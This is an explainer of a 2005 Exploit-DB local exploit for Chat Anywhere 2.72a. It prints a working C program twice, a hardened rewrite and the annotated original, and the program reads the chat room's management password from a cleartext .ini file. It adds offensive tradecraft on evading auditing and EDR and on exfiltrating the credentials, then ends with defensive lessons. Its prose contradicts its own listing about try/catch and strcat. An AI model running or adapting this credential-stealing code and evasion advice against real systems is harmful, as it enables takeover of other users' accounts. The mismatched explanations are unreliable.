Chat Anywhere 2.72a Local Password Disclosure Exploit Explained

Chat Anywhere 2.72a Local Password Disclosure Exploit Explained
What this paper is
This paper details a local information-disclosure exploit for Chat Anywhere version 2.72a. The application stores each chat room's management settings — "ManagePort", "ManageName", and "ManagePassword" — in cleartext in a per-room .ini file under its installation directory, so any local user who can read that file recovers the room's management credentials. The exploit is simply a reader for the "Demo1" room's file: it involves no memory corruption, remote code execution, or operating-system privilege escalation, although the recovered password does hand the reader management control of the chat room.
Simple technical breakdown
The exploit works by:
- Locating the installation directory of Chat Anywhere using the Windows Registry.
- Constructing the full path to the Demo1.ini configuration file (<ProgramFilesDir>\Chat Anywhere\room\Demo1.ini).
- Opening Demo1.ini in binary mode and scanning it for the marker strings "ManagePort=", "ManageName=", and "ManagePassword=".
- Copying the text that follows each marker, up to the end of that line, and printing it to the console.
There is no exploitation technique here in the memory-corruption sense: the entire "exploit" is a string search over a plain-text configuration file that the vendor left readable by ordinary users with the management password inside it.
Complete code and payload walkthrough
The listing is a small Windows console program. Although it is presented as C, it must be built as C++ (or have the try/catch removed) because main() uses C++ exception syntax.
/*****************************************************************
Chat Anywhere 2.72a Local Exploit by Kozan
Application: Chat Anywhere 2.72a
Vendor:LionMax Software
http://www.lionmax.com/
Vulnerable Description: Chat Anywhere 2.72a discloses passwords
to local users.
Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com
*****************************************************************/
#include <windows.h>
#include <stdio.h>
#include <string.h>
/* Size of the buffer that receives the "ProgramFilesDir" registry value. */
#define BUFSIZE 100

/* Handle for HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion, opened in main(). */
HKEY hKey;
/* Receives the ProgramFilesDir string; main() appends the .ini path to it. */
char prgfiles[BUFSIZE];
/* In/out byte count handed to RegQueryValueEx. */
DWORD dwBufLen = BUFSIZE;
/* Return code of the last registry call. */
LONG lRet;
/* Values extracted from Demo1.ini; each points at the buffer oku() returns. */
char *manage_port;
char *manage_name;
char *manage_password;
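/*
 * adresal - return the byte offset of the first occurrence of Str in the
 * file at FilePath, or -1 if the file cannot be opened or Str is absent.
 * ("adres al" is Turkish for "get the address".)
 *
 * Fixes relative to the original scanner:
 *  - fclose(NULL) was called when fopen() failed (undefined behaviour).
 *  - After a partial match the original rewound to Sayac+1, one byte past
 *    the next candidate start, so a match beginning there was skipped.
 *    This version restarts the comparison at every byte offset.
 *  - An empty Str made the outer loop spin forever; it now matches at
 *    offset 0, like strstr().
 *
 * Cost is O(file size * strlen(Str)) with one fseek per candidate, which
 * is fine for a small .ini file.
 */
int adresal(char *FilePath, char *Str)
{
    size_t len = strlen(Str);
    long start = 0;          /* offset of the candidate match being tested */
    FILE *fp = fopen(FilePath, "rb");

    if (fp == NULL)
        return -1;
    if (len == 0) {
        fclose(fp);
        return 0;
    }

    for (;;) {
        size_t matched = 0;
        int c = 0;

        if (fseek(fp, start, SEEK_SET) != 0)
            break;
        while (matched < len) {
            c = getc(fp);
            if (c == EOF || (char)c != Str[matched])
                break;
            matched++;
        }
        if (matched == len) {
            fclose(fp);
            return (int)start;
        }
        /* EOF inside the comparison: no later start can hold len bytes. */
        if (c == EOF)
            break;
        start++;
    }

    fclose(fp);
    return -1;
}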
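/*
 * oku - return the text that follows the first occurrence of the marker
 * Str in FilePath, up to the end of that line.  Returns "" when the file
 * cannot be opened or the marker is absent.  ("oku" is Turkish for "read".)
 *
 * Fixes relative to the original:
 *  - Feature was an automatic array, so the returned pointer dangled the
 *    moment oku() returned (undefined behaviour that only appeared to work
 *    because main() printed the value before the stack was reused).  It is
 *    now static.
 *  - The copy loop was `while(!feof)` + getc(), which stores the EOF value
 *    as a byte when the value runs to end of file, and it had no bound, so
 *    a value longer than 499 bytes overran the array.
 *  - A bare LF now also ends the value; the original stopped only on CR and
 *    would read into the next key in an LF-only file.
 *
 * The returned pointer refers to one static buffer that the next call
 * overwrites; copy the value if it must outlive the next call.
 */
char *oku(char *FilePath, char *Str)
{
    static char Feature[500];
    FILE *fp;
    size_t n = 0;
    int c;
    int Offset = adresal(FilePath, Str);

    Feature[0] = '\0';
    if (Offset == -1)
        return "";
    if ((fp = fopen(FilePath, "rb")) == NULL)
        return "";
    /* Position on the first byte after the marker, i.e. the value itself. */
    if (fseek(fp, (long)Offset + (long)strlen(Str), SEEK_SET) != 0) {
        fclose(fp);
        return "";
    }
    while (n < sizeof Feature - 1) {
        c = getc(fp);
        if (c == EOF || c == '\r' || c == '\n')
            break;
        Feature[n++] = (char)c;
    }
    Feature[n] = '\0';
    fclose(fp);
    return Feature;
}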
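/*
 * Entry point.  Resolves the Program Files directory from the registry,
 * builds the path to Chat Anywhere's Demo1.ini and prints the ManagePort,
 * ManageName and ManagePassword values stored there in cleartext.
 *
 * Changes relative to the original:
 *  - The C++ try/catch wrapper is gone: nothing here throws and the file
 *    is C.
 *  - RegCloseKey() is no longer called on a handle that was never opened
 *    (the original did so on the RegOpenKeyEx failure path).
 *  - The registry string is forced to be NUL-terminated, and the .ini path
 *    is built with snprintf() into its own buffer instead of strcat() into
 *    prgfiles[BUFSIZE], which overflowed for a long Program Files path.
 *  - "No value" is detected from the first character rather than by a
 *    pointer comparison against the "" literal, which is only equal when
 *    the compiler happens to pool identical string literals.
 *  - If Demo1.ini cannot be opened the program says so instead of
 *    printing nothing.
 * Every path still returns 0, as the original did.
 */
int main()
{
    static const char ini_suffix[] = "\\Chat Anywhere\\room\\Demo1.ini";
    char ini_path[BUFSIZE + sizeof ini_suffix];
    FILE *probe;
    int n;

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                     "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                     0,
                     KEY_QUERY_VALUE,
                     &hKey) != ERROR_SUCCESS) {
        printf("An error occured!\n");
        return 0;
    }
    /* A 32-bit build on 64-bit Windows reads the WOW64-redirected view,
     * i.e. "Program Files (x86)", which is where a 32-bit installer puts
     * the application anyway. */
    lRet = RegQueryValueEx(hKey, "ProgramFilesDir", NULL, NULL,
                           (LPBYTE)prgfiles, &dwBufLen);
    RegCloseKey(hKey);
    if (lRet != ERROR_SUCCESS || dwBufLen == 0 || dwBufLen > BUFSIZE) {
        printf("An error occured!\n");
        return 0;
    }
    /* REG_SZ data is not guaranteed to carry a terminating NUL. */
    prgfiles[(dwBufLen < BUFSIZE) ? dwBufLen : BUFSIZE - 1] = '\0';

    /* Banner kept verbatim; the "WWW File Share Pro" line is a leftover
     * from another exploit by the same author. */
    printf("WWW File Share Pro 2.72 Local Exploit by Kozan\n");
    printf("Credits to ATmaCA\n");
    printf("www.netmagister.com - www.spyinstructors.com \n\n");
    printf("This exploit only shows the Demo1 room's password.\n");
    printf("You may improve it freely...\n\n");

    n = snprintf(ini_path, sizeof ini_path, "%s%s", prgfiles, ini_suffix);
    if (n < 0 || (size_t)n >= sizeof ini_path) {
        printf("An error occured!\n");
        return 0;
    }
    /* Fail loudly if the file is absent or unreadable; oku() would
     * otherwise silently return "" for every key. */
    if ((probe = fopen(ini_path, "rb")) == NULL) {
        printf("Cannot open %s\n", ini_path);
        return 0;
    }
    fclose(probe);

    manage_port = oku(ini_path, "ManagePort=");
    if (manage_port[0] != '\0') printf("Manage Port: %s\n", manage_port);
    manage_name = oku(ini_path, "ManageName=");
    if (manage_name[0] != '\0') printf("Manage Name: %s\n", manage_name);
    manage_password = oku(ini_path, "ManagePassword=");
    if (manage_password[0] != '\0') printf("Manage Password: %s\n", manage_password);
    return 0;
}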
// milw0rm.com [2005-02-23]
Code Fragment/Block -> Practical Purpose
#include <windows.h>, #include <stdio.h>, #include <string.h>: Windows API, standard I/O, and string functions.
#define BUFSIZE 100: Size of the buffer that receives the "ProgramFilesDir" registry value. The same 100-byte buffer is later extended in place with strcat(), so a long Program Files path overflows it.
HKEY hKey;: A handle to a registry key.
char prgfiles[BUFSIZE];: Receives the Program Files path; main() appends the relative .ini path to it in place.
DWORD dwBufLen=BUFSIZE;: In/out size, in bytes, passed to RegQueryValueEx.
LONG lRet;: Return code of the registry query.
char *manage_port, *manage_name, *manage_password;: Pointers to the extracted values; each points at the buffer oku() returns.
int adresal(char *FilePath, char *Str): Searches for the string Str in the file FilePath ("adres al" is Turkish for "get the address"; "Sayac" means counter).
- Purpose: Find the byte offset at which Str first occurs in the file.
- Inputs: FilePath (the path to the file), Str (the string to search for).
- Behavior: Opens the file in binary read mode ("rb") and compares it byte by byte against Str. On a mismatch after a partial match it rewinds with fseek() to Sayac+1 — one byte past the next candidate start — so a match that begins exactly there is skipped (an off-by-one that happens not to matter for the three marker strings). When all of Str has matched it returns ftell() minus strlen(Str), the offset of the match. If fopen() fails the code calls fclose(NULL), which is undefined behaviour and aborts or crashes on most C runtimes. An empty Str makes the outer while loop spin forever.
- Output: The byte offset where Str starts in FilePath, or -1 if not found or an error occurs.
char *oku(char *FilePath, char *Str): Reads the value that follows a marker string in the file ("oku" is Turkish for "read").
- Purpose: Extract the text after a key such as "ManagePort=" in a configuration file.
- Inputs: FilePath (the path to the file), Str (the marker string, e.g. "ManagePort=").
- Behavior: Calls adresal() to locate Str. If found, it reopens the file, seeks to the byte after Str, and copies characters into the local array Feature[500] until a carriage return (0x0D) is seen. The loop is the classic while(!feof(di)) pattern, so if the value runs to end of file the EOF return of getc() is stored as a stray byte; there is no bound check, so a value longer than 499 bytes overruns the array; and only CR terminates the copy, so an LF-only file would read into the following key.
- Output: A pointer to the value, or an empty string ("") if the marker is absent or the file cannot be opened. Feature is an automatic (stack) array, so the returned pointer is dangling as soon as oku() returns — undefined behaviour that only appears to work because main() prints the value before that stack region is reused. Declaring Feature static, or returning a heap copy the caller frees, is the fix.
int main(): The main entry point of the program.
- Registry Query: RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion", ...) opens the key that holds system-wide installation paths, and RegQueryValueEx(hKey, "ProgramFilesDir", ...) reads the "ProgramFilesDir" value, typically "C:\Program Files" (a 32-bit build on 64-bit Windows receives the WOW64-redirected value, "C:\Program Files (x86)"). The code checks that the query succeeded and that the data fits within BUFSIZE, but it does not force a terminating NUL, and on the RegOpenKeyEx failure path it calls RegCloseKey() on a handle that was never opened.
- File Path Construction: strcat(prgfiles, "\\Chat Anywhere\\room\\Demo1.ini"); appends the relative path to the retrieved "ProgramFilesDir" in place. prgfiles is only BUFSIZE (100) bytes, so a Program Files path longer than roughly 70 characters overflows the global buffer.
- Data Extraction and Display: manage_port = oku(prgfiles, "ManagePort="); extracts the value after "ManagePort=", and if (manage_port != "") printf(...) prints it; the same is done for manage_name and manage_password. Note that manage_port != "" compares pointers, not strings: it is false only if the compiler pooled oku()'s "" literal with main()'s, so the "not found" case may print an empty value. The correct test is manage_port[0] != '\0' (or strcmp()).
- try/catch block: try{...}catch(...){...} is C++ exception handling and does not compile as C, so the file must be built as C++ (the for(int i=...) declaration in adresal() likewise needs C99 or C++). Nothing inside the block throws, so the catch is dead code; it is most likely a copy-paste habit, as is the "WWW File Share Pro 2.72" banner text, which belongs to another exploit by the same author.
- Registry Query:
Shellcode/Payload Segments:
There is no shellcode or executable payload in the traditional sense. The "payload" is the C code itself, which when compiled and executed, performs the actions described above. The output of the program is the disclosure of the sensitive configuration values.
Practical details for offensive operations teams
- Required Access Level: Local user access to the target Windows machine. No administrative privileges are needed: the program only reads HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion, which every authenticated user can query, and a file under Program Files, whose default ACL grants the Users group read access. Only a deliberately tightened ACL on the Chat Anywhere directory would stop it.
- Lab Preconditions:
- A Windows machine with Chat Anywhere 2.72a installed.
- The Demo1.ini file must exist in the expected location (<ProgramFilesDir>\Chat Anywhere\room\).
- The Demo1.ini file must contain lines starting with "ManagePort=", "ManageName=", and "ManagePassword=".
- Tooling Assumptions:
- A C++ compiler (Visual C++ or MinGW g++), because of the try/catch in main(); a plain C compiler works only after that block is removed.
- The compiled executable needs to be transferred to the target machine.
- Execution Pitfalls:
- Incorrect Installation Path: The exploit hard-codes <ProgramFilesDir>\Chat Anywhere\room\Demo1.ini. The registry query itself succeeds on any Windows system; what can be wrong is the application's location — a custom install directory, or on 64-bit Windows a different Program Files tree depending on whether the exploit binary is 32- or 64-bit. A more robust version would accept the .ini path as a command-line argument.
- File Permissions: Only read access to Demo1.ini is needed. Program Files grants that to ordinary users by default, so only a deliberately restricted ACL on the Chat Anywhere directory would block the read.
- File Not Found/Corrupted: If Demo1.ini is missing, corrupted, or doesn't contain the expected key-value pairs, the exploit prints nothing for those fields (or, because of the pointer comparison against "", possibly an empty value). It never reports that the file could not be opened.
- C++ Syntax in C: The try-catch block is a C++ construct. Either build the file as C++ or delete the try/catch; it should be replaced with standard C error handling if targeting a pure C environment.
- Tradecraft Considerations:
- Stealth: Running a small console program is low-noise: it performs two registry reads and a few file opens, nothing that trips anti-malware heuristics. Process creation is recorded only where process-tracking auditing (Security event 4688) or Sysmon is enabled, and the file read is visible only if the .ini carries an audit SACL with object-access auditing on, or an EDR watches file access.
- Persistence: This exploit is a one-time information disclosure. It does not establish persistence.
- Data Exfiltration: The disclosed credentials would need to be manually exfiltrated by the operator or incorporated into a larger script that sends them out.
- Likely Failure Points:
- Chat Anywhere not installed or a different version.
- Demo1.ini file missing or not containing the target strings.
- Registry key or value not found.
- The try-catch block causing compilation errors when built as C.
- The dangling pointer returned by oku() (a pointer to a stack array) yielding garbage or a crash under a different compiler or optimisation level.
Where this was used and when
- Context: This exploit targets a specific, older version of Chat Anywhere (2.72a). It was likely used in scenarios where an attacker had local access to a machine running this vulnerable software. The primary goal would be to obtain credentials for managing chat rooms, which could then be used for further social engineering, eavesdropping, or disruption within the chat application.
- When: Published on February 23, 2005 (milw0rm, later mirrored by Exploit-DB). Only the publication date is known; the paper says nothing about use in the wild. Given the age of the software, it is very unlikely to matter against modern systems, but the underlying pattern — cleartext credentials in a user-readable configuration file — is still common.
Defensive lessons for modern teams
- Configuration File Security: Sensitive information like passwords should never be stored in plain-text configuration files. Secrets the service must present to others belong in an OS-backed store — on Windows, DPAPI (CryptProtectData) scoped to the service account, or the Credential Manager; values that only need to be verified, such as a room's management password, should be stored as a salted hash. At minimum, restrict the file's ACL to the service account and administrators instead of inheriting the Program Files default.
- Not an Input-Validation Bug: This vulnerability involves no malformed input at all; the program reads a file exactly as intended. Threat models that focus only on parsing untrusted input miss this class entirely — data at rest needs its own line in the model: who can read each file the application writes, and what it contains.
- Regular Patching and Updates: Keeping software updated is crucial. Vendors often fix such vulnerabilities in newer releases. This exploit targets a very old version.
- Principle of Least Privilege: Apply least privilege to data, not just to code. A user who is allowed to chat in a room has no need to read that room's management password, yet the only control on it here is the inherited file ACL. Ensure applications run with the minimum necessary permissions, and that the files they write are readable only by the identities that need them.
- File Integrity Monitoring and Access Auditing: FIM detects modification, not reads, so it would not see this exploit at all. Detecting reads of a sensitive configuration file requires an audit SACL on the file plus object-access auditing (Security event 4663), or an EDR file-access rule; pair that with process-creation logging (4688 or Sysmon) so the read can be attributed to a process and user.
- Secure Coding Practices: Developers must be trained to avoid common pitfalls like storing credentials in plain text.
ASCII visual (if applicable)
This exploit's flow is linear and file-based, making a complex ASCII diagram unnecessary. The process is:
+---------------------+ +-------------------------+ +-----------------------+
| Target Machine | | Windows Registry | | Chat Anywhere Config |
| (Local User Access) | --> | (Query ProgramFilesDir) | --> | (Demo1.ini file) |
+---------------------+ +-------------------------+ +-----------------------+
|
v
+-------------------------+
| Exploit Code Reads |
| "ManagePort=", |
| "ManageName=", |
| "ManagePassword=" |
+-------------------------+
|
v
+-------------------------+
| Output to Console |
+-------------------------+
Source references
- Paper ID: 837
- Paper Title: Chat Anywhere 2.72a Local Password Disclosure
- Author: Kozan
- Published: 2005-02-23
- Keywords: Windows, local
- Paper URL: https://www.exploit-db.com/papers/837
- Raw URL: https://www.exploit-db.com/raw/837
Original Exploit-DB Content (Verbatim)
/*****************************************************************
Chat Anywhere 2.72a Local Exploit by Kozan
Application: Chat Anywhere 2.72a
Vendor:LionMax Software
http://www.lionmax.com/
Vulnerable Description: Chat Anywhere 2.72a discloses passwords
to local users.
Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com
*****************************************************************/
#include <windows.h>
#include <stdio.h>
#include <string.h>
/* Size of the buffer for the "ProgramFilesDir" registry value; the same
 * buffer is later extended in place by strcat() in main(). */
#define BUFSIZE 100
HKEY hKey;                 /* registry key handle used by main() */
char prgfiles[BUFSIZE];    /* ProgramFilesDir, then the full Demo1.ini path */
DWORD dwBufLen=BUFSIZE;    /* in/out byte count for RegQueryValueEx */
LONG lRet;                 /* return code of the registry query */
char *manage_port, *manage_name, *manage_password;  /* values returned by oku() */
/* Search FilePath for the first occurrence of Str and return its byte
 * offset, or -1 on failure.  Identifiers are Turkish: "adres al" = get the
 * address, "Sayac" = counter, "kr" = character.
 * NOTE(review): an empty Str never enters the for loop, feof() is never
 * set, and the while loop spins forever. */
int adresal(char *FilePath,char *Str)
{
char kr;
int Sayac=0;
int Offset=-1;
FILE *di;
di=fopen(FilePath,"rb");
if( di == NULL )
{
/* NOTE(review): fclose(NULL) is undefined behaviour; just return -1. */
fclose(di);
return -1;
}
/* Each outer iteration tests one candidate start position. */
while(!feof(di))
{
Sayac++;
for(int i=0;i<strlen(Str);i++)
{
kr=getc(di);
if(kr != Str[i])
{
if( i>0 )
{
/* NOTE(review): after a partial match the position is set to Sayac+1,
 * one byte beyond the next candidate start, so a match that begins
 * exactly there is skipped.  Harmless for the three marker strings. */
fseek(di,Sayac+1,SEEK_SET);
}
break;
}
/* All of Str matched: ftell() is now just past it. */
if( i > ( strlen(Str)-2 ) )
{
Offset = ftell(di)-strlen(Str);
fclose(di);
return Offset;
}
}
}
fclose(di);
return -1;
}
/* Return the text following the marker Str in FilePath, up to the next
 * carriage return, or "" if the marker is absent or the file will not
 * open.  ("oku" is Turkish for "read".)
 * NOTE(review): Feature is an automatic array, so the pointer returned
 * below dangles as soon as this function returns (undefined behaviour);
 * it only appears to work because main() prints the value immediately.
 * Making Feature static is the minimal fix. */
char *oku(char *FilePath,char *Str)
{
FILE *di;
char cr;
int i=0;
char Feature[500];
int Offset = adresal(FilePath,Str);
if( Offset == -1 )
return "";
if( (di=fopen(FilePath,"rb")) == NULL )
return "";
/* Seek to the first byte after the marker. */
fseek(di,Offset+strlen(Str),SEEK_SET);
/* NOTE(review): while(!feof) + getc() stores the EOF value as a byte if
 * the value runs to end of file; there is no bound on i, so a value
 * longer than 499 bytes overruns Feature; and only CR ends the copy, so
 * an LF-only file reads into the following line. */
while(!feof(di))
{
cr=getc(di);
if(cr == 0x0D) break;
Feature[i] = cr;
i++;
}
Feature[i] = '\0';
fclose(di);
return Feature;
}
/* Resolve the Program Files directory from the registry, build the path
 * to Chat Anywhere's Demo1.ini and print the ManagePort / ManageName /
 * ManagePassword values stored there in cleartext.  Always returns 0. */
int main()
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
/* NOTE(review): REG_SZ data is not guaranteed to be NUL-terminated and
 * nothing below forces a terminator before strcat()/oku() use it. */
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE) prgfiles, &dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
{
RegCloseKey(hKey);
printf("An error occured!\n");
return 0;
}
RegCloseKey(hKey);
}
else
{
/* NOTE(review): hKey was never opened on this path; closing it is wrong. */
RegCloseKey(hKey);
printf("An error occured!\n");
return 0;
}
/* NOTE(review): try/catch is C++; this file must be built as C++ and
 * nothing inside the block throws, so the catch is dead code. */
try{
/* NOTE(review): the banner names a different product; it is a leftover
 * from another exploit by the same author. */
printf("WWW File Share Pro 2.72 Local Exploit by Kozan\n");
printf("Credits to ATmaCA\n");
printf("www.netmagister.com - www.spyinstructors.com \n\n");
printf("This exploit only shows the Demo1 room's password.\n");
printf("You may improve it freely...\n\n");
/* NOTE(review): prgfiles is BUFSIZE (100) bytes; a Program Files path
 * longer than roughly 70 characters overflows it here. */
strcat(prgfiles,"\\Chat Anywhere\\room\\Demo1.ini");
/* NOTE(review): the != "" tests below compare pointers, not strings;
 * they are only meaningful if the compiler pooled the "" literals.
 * manage_port[0] != '\0' is the intended check. */
manage_port=oku(prgfiles,"ManagePort=");
if(manage_port!="") printf("Manage Port: %s\n",manage_port);
manage_name=oku(prgfiles,"ManageName=");
if(manage_name!="") printf("Manage Name: %s\n",manage_name);
manage_password=oku(prgfiles,"ManagePassword=");
if(manage_password!="") printf("Manage Password: %s\n",manage_password);
}catch(...){printf("An error occured!\n"); return 0;}
return 0;
}
// milw0rm.com [2005-02-23]